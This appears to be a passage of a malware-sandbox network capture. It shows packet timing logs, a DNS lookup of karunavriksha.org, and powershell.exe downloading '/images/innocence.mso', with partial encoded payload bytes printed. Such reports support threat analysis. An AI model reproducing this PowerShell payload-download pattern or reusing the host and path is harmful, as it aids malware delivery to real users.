Apr 8, 2025 08:12:30.175604105 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.176593065 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.176610947 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.176682949 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.176691055 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.176779985 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.226012945 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.226038933 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.226119041 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.226139069 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.226175070 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.473412991 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.473433018 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.473552942 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.473570108 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.473690987 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.474009037 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.474025011 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.474092960 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.474102020 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.474147081 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.475085974 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.475109100 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.475184917 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.475193024 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.475239992 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.476883888 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.476902008 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.477001905 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.477014065 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.477056980 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.478101015 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.478116035 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.478185892 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.478197098 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.478251934 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.526705980 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.526731968 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.526868105 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.526885033 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.526949883 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.774704933 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.774735928 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.774779081 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.774801970 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.774827957 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.774852037 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.775957108 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.775978088 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.776009083 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.776014090 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.776036024 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.776082993 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.778057098 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.778079033 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.778122902 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.778127909 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.778147936 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.778187037 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.780543089 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.780570030 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.780601978 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.780610085 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.780633926 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.780668974 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.782519102 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.782543898 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.782599926 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.782599926 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.782608032 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.782692909 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.784554958 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.784578085 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.784650087 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.784650087 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.784658909 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.784698009 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.786109924 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.786133051 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.786180973 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.786180973 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.786187887 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.786259890 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.788904905 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.788925886 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.789016008 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.789016008 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.789046049 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.789139986 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.790702105 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.790731907 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.790765047 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.790771961 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.790817022 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.790817022 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.791459084 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.791482925 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.791654110 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.791662931 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.791724920 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.827667952 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.827704906 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.827768087 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.827768087 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.827780962 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.827820063 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.829370022 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.829394102 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.829427958 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.829435110 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.829457998 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.829507113 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.370645046 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.370659113 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.370698929 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.370728016 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.370748997 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.370764017 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.370769978 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.370798111 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.370800972 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.370807886 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.370826006 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.370846987 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.370872021 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.370891094 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.370906115 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.370913029 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.370929003 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.370954990 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.370971918 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.370971918 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.370973110 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.370986938 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.371010065 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.371031046 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.371051073 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.371068954 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.371115923 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.371121883 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.371130943 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.371146917 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.371166945 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.371170044 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.371179104 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.371201038 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.371238947 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.371246099 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.371253014 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.371269941 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.371299982 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.371305943 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.371315956 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.371330023 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.371352911 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.371360064 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.371375084 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.371388912 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.371419907 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.371432066 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.371454954 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.371496916 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.371501923 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.371510983 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.371510983 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.371532917 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.371536016 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.371542931 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.371567965 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.371597052 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.371611118 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.371629000 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.371681929 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.371696949 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.371704102 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.371737957 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.371779919 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.371797085 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.371798038 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.371809006 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.371839046 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.371872902 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.371876955 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.371884108 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.371908903 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.371939898 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.371939898 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.371952057 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.371956110 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.371973038 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.371975899 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.372004986 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.372011900 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.372028112 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.372143984 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.372163057 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.394969940 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.394999027 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.395054102 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.395065069 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.395092010 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.395102024 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:31.395121098 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.395159960 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:31.398516893 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 8, 2025 08:12:27.396853924 CEST | 63576 | 53 | 192.168.2.9 | 1.1.1.1
Apr 8, 2025 08:12:28.337133884 CEST | 53 | 63576 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 8, 2025 08:12:27.396853924 CEST | 192.168.2.9 | 1.1.1.1 | 0x34e9 | Standard query (0) | karunavriksha.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 8, 2025 08:12:28.337133884 CEST | 1.1.1.1 | 192.168.2.9 | 0x34e9 | No error (0) | karunavriksha.org | | 146.88.26.238 | A (IP address) | IN (0x0001) | false
                                    • karunavriksha.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49683 | 146.88.26.238 | 443 | 6560 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2025-04-08 06:12:29 UTC | 181 | OUT | GET /images/innocence.mso HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Host: karunavriksha.org
Connection: Keep-Alive
2025-04-08 06:12:29 UTC | 250 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Apr 2025 06:12:29 GMT
Content-Length: 643188
Connection: close
Strict-Transport-Security: max-age=300; includeSubDomains; preload
Last-Modified: Mon, 07 Apr 2025 00:21:47 GMT
Accept-Ranges: bytes
2025-04-08 06:12:29 UTC | 16134 | IN | Data Raw: 5a 6f 50 71 41 4c 75 2b 66 42 77 41 32 64 41 44 58 43 51 45 6d 37 6b 2f 53 56 52 58 67 65 6b 4e 6e 46 39 50 67 66 45 79 72 66 51 48 67 2f 4d 41 75 6f 31 68 53 34 72 5a 30 47 59 68 77 44 48 4b 49 4d 6d 4a 46 41 75 44 77 77 44 52 34 6d 61 44 38 77 43 44 77 51 54 5a 30 49 48 35 41 6d 62 54 41 33 7a 67 69 30 51 6b 42 47 59 68 77 49 6e 44 5a 6f 50 4a 41 49 48 44 79 50 7a 78 41 49 48 37 36 42 54 4c 5a 37 71 53 76 79 37 75 67 66 49 6e 6f 66 57 38 67 66 4b 31 48 74 74 53 5a 6f 50 48 41 43 44 53 69 77 77 51 67 4d 6b 41 69 51 77 54 5a 73 48 76 41 45 49 68 79 59 48 36 73 4f 49 47 41 48 58 6d 77 65 4d 41 69 56 77 6b 44 50 79 42 37 51 41 44 41 41 43 44 79 67 43 4c 56 43 51 49 67 50 45 41 69 33 77 6b 42 49 50 72 41 49 6e 72 77 4f 73 41 67 63 4f 63 41 41 41 41 49 4d 42
Data Ascii: ZoPqALu+fBwA2dADXCQEm7k/SVRXgekNnF9PgfEyrfQHg/MAuo1hS4rZ0GYhwDHKIMmJFAuDwwDR4maD8wCDwQTZ0IH5AmbTA3zgi0QkBGYhwInDZoPJAIHDyPzxAIH76BTLZ7qSvy7ugfInofW8gfK1HttSZoPHACDSiwwQgMkAiQwTZsHvAEIhyYH6sOIGAHXmweMAiVwkDPyB7QADAACDygCLVCQIgPEAi3wkBIPrAInrwOsAgcOcAAAAIMB
2025-04-08 06:12:29 UTC | 16384 | IN | Data Raw: 74 58 59 76 66 74 49 47 30 77 32 31 64 74 4d 4e 74 58 62 54 44 62 56 32 30 77 32 31 64 74 4d 4e 74 58 62 54 44 62 56 32 30 77 32 31 64 74 4d 4e 76 43 53 51 4d 77 57 65 5a 39 78 2b 32 74 48 70 51 6d 68 51 75 57 55 57 32 35 6e 6e 4d 2f 69 71 30 63 74 50 41 47 6c 75 7a 43 44 6c 72 49 6d 77 57 5a 37 4d 4b 66 67 64 39 50 76 56 67 65 78 77 37 57 6e 32 4f 55 6d 58 6e 6f 44 4e 35 58 75 71 6d 35 6b 6f 63 70 6b 75 41 41 58 32 67 47 38 77 45 38 74 38 63 4d 2b 55 71 6a 5a 6a 4d 6b 65 64 52 2f 33 75 4e 79 44 2f 64 61 51 62 62 56 69 6f 45 48 31 55 73 30 55 73 75 72 41 4c 56 59 52 41 38 74 2f 71 73 41 74 55 42 79 68 6b 2b 4a 56 74 51 68 6a 68 30 57 69 77 74 68 42 62 49 38 72 46 4b 32 5a 44 46 47 62 37 31 42 31 4e 64 75 4b 4a 6e 4d 7a 74 74 57 52 38 49 68 37 74 2b 70 6a
Data Ascii: tXYvftIG0w21dtMNtXbTDbV20w21dtMNtXbTDbV20w21dtMNvCSQMwWeZ9x+2tHpQmhQuWUW25nnM/iq0ctPAGluzCDlrImwWZ7MKfgd9PvVgexw7Wn2OUmXnoDN5Xuqm5kocpkuAAX2gG8wE8t8cM+UqjZjMkedR/3uNyD/daQbbVioEH1Us0UsurALVYRA8t/qsAtUByhk+JVtQhjh0WiwthBbI8rFK2ZDFGb71B1NduKJnMzttWR8Ih7t+pj
2025-04-08 06:12:30 UTC | 16384 | IN | Data Raw: 74 58 62 54 44 62 56 32 30 77 54 6d 5a 6f 56 78 35 71 72 39 38 36 6f 6d 4b 30 76 54 52 72 4d 4e 52 58 66 63 2f 62 56 32 30 77 32 31 64 74 4d 4e 74 58 62 54 44 62 56 32 30 77 32 31 64 74 4d 4e 74 58 62 54 44 62 56 32 30 77 32 31 64 74 70 54 49 43 6e 4f 33 6d 42 4e 58 44 54 31 6a 70 41 37 68 52 62 51 31 46 57 4c 47 6d 31 4e 4e 46 55 39 31 58 55 4b 79 46 74 75 45 2f 58 30 6f 4f 4e 74 74 71 43 52 36 6a 72 57 4b 30 79 54 52 72 4d 4f 61 36 33 72 43 6d 57 4f 6b 33 75 46 46 74 44 53 5a 73 77 35 37 55 30 35 46 53 33 56 63 2f 69 6d 37 2f 49 39 75 39 57 49 54 54 57 71 55 46 49 69 68 6e 59 73 30 65 31 6f 66 74 59 75 71 32 37 69 67 41 38 62 6b 38 58 6e 71 74 34 34 59 55 4f 41 59 72 47 70 59 76 76 51 48 6f 36 34 45 59 47 50 42 4f 6e 45 76 6b 4f 65 57 62 58 36 4a 34 5a
Data Ascii: tXbTDbV20wTmZoVx5qr986omK0vTRrMNRXfc/bV20w21dtMNtXbTDbV20w21dtMNtXbTDbV20w21dtpTICnO3mBNXDT1jpA7hRbQ1FWLGm1NNFU91XUKyFtuE/X0oONttqCR6jrWK0yTRrMOa63rCmWOk3uFFtDSZsw57U05FS3Vc/im7/I9u9WITTWqUFIihnYs0e1oftYuq27igA8bk8Xnqt44YUOAYrGpYvvQHo64EYGPBOnEvkOeWbX6J4Z
2025-04-08 06:12:30 UTC | 16384 | IN | Data Raw: 6d 71 39 33 63 63 34 44 4f 37 6c 67 75 68 69 63 44 4c 31 67 43 4a 4c 6e 66 33 63 4e 52 37 44 6c 33 39 32 32 67 74 50 70 61 61 6b 2f 58 6b 65 5a 6c 46 6d 6a 6d 48 51 79 56 78 67 38 37 58 47 45 34 77 4e 76 77 31 6b 63 4d 35 37 35 2b 6d 2f 79 79 30 63 4c 68 6e 2f 52 30 59 67 34 35 48 68 72 35 34 63 42 31 6b 59 6a 2f 41 6f 54 65 41 76 4d 56 53 39 4e 6a 4e 75 6d 67 77 4a 4f 4c 78 4d 4e 74 58 6b 75 43 4d 36 43 59 32 65 66 53 30 7a 56 71 67 42 75 42 33 64 41 73 2f 49 5a 2f 73 78 79 61 4b 57 4e 63 43 68 2b 7a 48 33 4a 39 57 56 37 31 59 67 73 4a 53 61 43 33 4d 68 41 75 4e 31 48 64 6f 44 62 6e 64 37 6a 78 72 32 6a 7a 56 77 36 30 54 57 78 51 4a 51 6b 47 6a 6a 51 67 69 52 44 31 74 46 4b 74 39 52 6a 49 2f 32 67 4a 74 4d 4e 74 58 62 54 44 62 56 32 30 77 32 31 64 74 4d
Data Ascii: mq93cc4DO7lguhicDL1gCJLnf3cNR7Dl3922gtPpaak/XkeZlFmjmHQyVxg87XGE4wNvw1kcM575+m/yy0cLhn/R0Yg45Hhr54cB1kYj/AoTeAvMVS9NjNumgwJOLxMNtXkuCM6CY2efS0zVqgBuB3dAs/IZ/sxyaKWNcCh+zH3J9WV71YgsJSaC3MhAuN1HdoDbnd7jxr2jzVw60TWxQJQkGjjQgiRD1tFKt9RjI/2gJtMNtXbTDbV20w21dtM
